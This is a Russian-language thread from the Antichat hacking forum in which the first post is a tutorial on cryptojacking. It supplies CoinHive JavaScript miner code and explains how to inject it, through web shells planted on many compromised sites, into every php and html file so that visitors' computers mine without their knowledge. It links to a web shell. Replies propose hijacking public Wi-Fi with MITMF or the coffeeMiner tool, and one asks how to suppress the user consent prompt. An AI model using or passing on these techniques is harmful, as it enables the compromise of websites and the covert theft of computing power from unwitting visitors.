HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.01.2018, 00:37
DefWolf
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами: 4502036

Репутация: 0
По умолчанию



Майнинг, также добыча— деятельность по поддержанию распределённой платформы и созданию новых блоков с возможностью получить вознаграждение в форме новых единиц и комиссионных сборов в различных криптовалютах, в частности в Биткойн.
Coin-hive.com - это сайт, который предлагает вебмастеру встроить в свой сайт утилиту для майнинга биткоинов.

Типичная майнинг-ферма – это высокопроизводительный компьютер с несколькими видеокартами. На первый взгляд кажется, что все просто: подключаешь компьютер к сети, настраиваешь и наблюдаешь, как он зарабатывает деньги.

Вместо того, чтобы создавать ферму из наших видеокарт, мы будем использовать мощность посетителей сайтов. Мы вставим javascript код на все страницы нашего сайта. Для майнинга криптовалюты мы будем использовать библиотеку coinhive.

JavaScript:


Код:

Дальше идет основная часть нашего кода. В ней мы указываем ключ XXXX и имя, которое будет отображаться у нас на странице. Потом мы указываем кол-во потоков, крайне важно, чтобы число потоков не превышало 8 или 16. Далее скрипт вывод в console.log информацию о нашем хэшах.

Подробнее с функциями библиотеки можно ознакомиться здесь.

Код:


Код:
    var miner = new CoinHive.User("XXXX", "Test");
    miner.start();
 
    setInterval( function() {
        miner.setNumThreads(8);
        miner.setThrottle(0.5);

        console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " +  miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
    }, 1000);
Допустим мы имеем доступ ко множеству сайтов, где у нас установлен web-shell: https://pastebin.com/ycSazL8B
Регистрируемся на coinhive, получаем ключ и вставляем его в javascript код. В полуinfection указываем каталог, в файлы которого будет вставлен майнер. Шелл вставит вредоносный скрипт только в файлы имеющие расширение php или html.



Сколько мы получаем хэшей можно посмотреть в консоли. Чем больше на сайте будет посетителей, чем больше хэшей вы получите. Еще как один из вариантов код майнера можно вставить в рекламу или расширение для браузера.
 
Ответить с цитированием

  #2  
Старый 14.01.2018, 01:14
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

SooLFaa сказал(а):

Запрещено:
1) Разглашение любой информации данной секции;

 
Ответить с цитированием

  #3  
Старый 14.01.2018, 09:58
DefWolf
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами: 4502036

Репутация: 0
По умолчанию

При редактировании статьи кое-где допустил ошибки...

Цитата:

mrOkey сказал(а):

Цитата:

SooLFaa сказал(а):

Запрещено:
1) Разглашение любой информации данной секции;

Никакого раскрытия информации не было, статью я написал сам и она отличается от той, что находится в gray section. Две разные статьи на 1 тему.
 
Ответить с цитированием

  #4  
Старый 14.01.2018, 12:51
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)
 
Ответить с цитированием

  #5  
Старый 14.01.2018, 13:11
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

DefWolf сказал(а):

Никакой раскрытии информации не было, статью я написал сам и она отличается от той, что находится в gray time. Две разные статьи на 1 тему.

это и есть раскрытие))
 
Ответить с цитированием

  #6  
Старый 14.01.2018, 13:25
linked3234
Познающий
Регистрация: 30.07.2017
Сообщений: 47
С нами: 4625670

Репутация: 0
По умолчанию

ребят, вопрос: как вставляется JS код на сайт, сразу выскакивает сообщение, типа "Мол, разреши использовать данному сайту вычислительные мощности твоего компьютера..". Вопрос: это убрать, что бы тупо прямо сразу начался майнинг при заходе на сайт, без оповещения?
 
Ответить с цитированием

  #7  
Старый 14.01.2018, 13:31
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

linked3234 сказал(а):

как вставляется JS код на сайт

все же написано....

Цитата:

linked3234 сказал(а):

Вопрос: это убрать, что бы тупо прямо сразу начался майнинг

никак... антивирус, вроде блокирует такие js https://hashkiller.co.uk/md5-decrypter.aspx <--вот пример)
 
Ответить с цитированием

  #8  
Старый 14.01.2018, 13:33
DefWolf
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами: 4502036

Репутация: 0
По умолчанию

Цитата:

Ondrik8 сказал(а):

принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)

Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner
 
Ответить с цитированием

  #9  
Старый 14.01.2018, 13:43
DefWolf
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами: 4502036

Репутация: 0
По умолчанию

Цитата:

mrOkey сказал(а):

это и есть раскрытие))

Глупо, каждый раз сверять темы с gray time, при написании статьи, да и даже если сверить, то статьи на одинаковою тему отличаются
 
Ответить с цитированием

  #10  
Старый 14.01.2018, 13:47
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

DefWolf сказал(а):

сверять темы

глупо постить одно и то же, а сверять довольно полезно
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.